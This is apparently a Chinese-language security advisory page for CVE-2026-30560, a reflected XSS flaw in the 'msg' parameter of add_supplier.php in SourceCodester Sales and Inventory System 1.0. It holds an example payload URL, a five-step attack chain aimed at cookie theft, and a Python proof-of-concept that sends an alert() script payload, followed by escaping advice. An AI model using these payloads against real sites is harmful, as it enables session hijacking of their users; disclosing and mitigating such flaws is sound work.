IPBUF安全漏洞报告
English
CVE-2026-30560 CVSS 6.1 中危

CVE-2026-30560: SourceCodester库存系统XSS漏洞

披露日期: 2026-03-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30560
漏洞类型
跨站脚本 (XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
SourceCodester Sales and Inventory System

相关标签

XSSReflected XSSSourceCodesterWeb SecurityCVE-2026-30560

漏洞概述

SourceCodester Sales and Inventory System 1.0版本中存在反射型跨站脚本(XSS)漏洞。该漏洞源于add_supplier.php文件未能正确过滤'msg'参数。远程攻击者可诱导用户访问特制恶意链接,在受害者浏览器中执行任意Web脚本或HTML,可能导致窃取Cookie或会话劫持。

技术细节

该漏洞发生在SourceCodester Sales and Inventory System 1.0的add_supplier.php页面处理逻辑中。应用程序直接将GET请求参数'msg'的值反射到HTTP响应页面中,未进行任何有效的输入验证或输出编码。攻击者可以利用此缺陷,构造包含恶意JavaScript代码的URL(例如:`/add_supplier.php?msg=<img src=x onerror=alert(1)>`)。由于CVSS向量包含S:C(作用域改变),该脚本执行可能影响浏览器同源策略下的其他上下文。攻击无需认证(PR:N),但需要用户交互(UI:R)才能触发。

攻击链分析

STEP 1
侦察
攻击者确认目标系统运行SourceCodester Sales and Inventory System 1.0,并发现add_supplier.php接口存在msg参数。
STEP 2
武器化
攻击者构造包含恶意JavaScript代码的URL,利用msg参数传递XSS Payload,例如窃取Session的脚本。
STEP 3
交付
攻击者通过钓鱼邮件或社交媒体将特制的恶意链接发送给目标系统的合法用户。
STEP 4
利用
受害者点击链接,浏览器向服务器发送请求,服务器将未过滤的恶意脚本返回给受害者浏览器。
STEP 5
达成目标
受害者浏览器执行恶意脚本,攻击者从而获取受害者的Cookie或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://target-host/sales_inventory/add_supplier.php" # Malicious payload to test XSS reflection # Using a simple script tag to demonstrate execution payload = "<script>alert('CVE-2026-30560_XSS');</script>" # Inject payload into the vulnerable parameter params = { "msg": payload } try: # Send the GET request response = requests.get(target_url, params=params, timeout=5) # Check if the payload is reflected un-sanitized in the response if payload in response.text: print("[+] Vulnerability Confirmed: XSS payload is reflected in the response.") print(f"[+] PoC Link: {response.url}") else: print("[-] Vulnerability not detected or payload was sanitized.") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}")

影响范围

SourceCodester Sales and Inventory System 1.0

防御指南

临时缓解措施
在未获得官方补丁前,建议开发人员修改源代码,在输出'msg'参数内容时使用PHP的htmlspecialchars()函数进行转义,或者移除该参数的直接回显功能,以阻断恶意脚本的执行路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表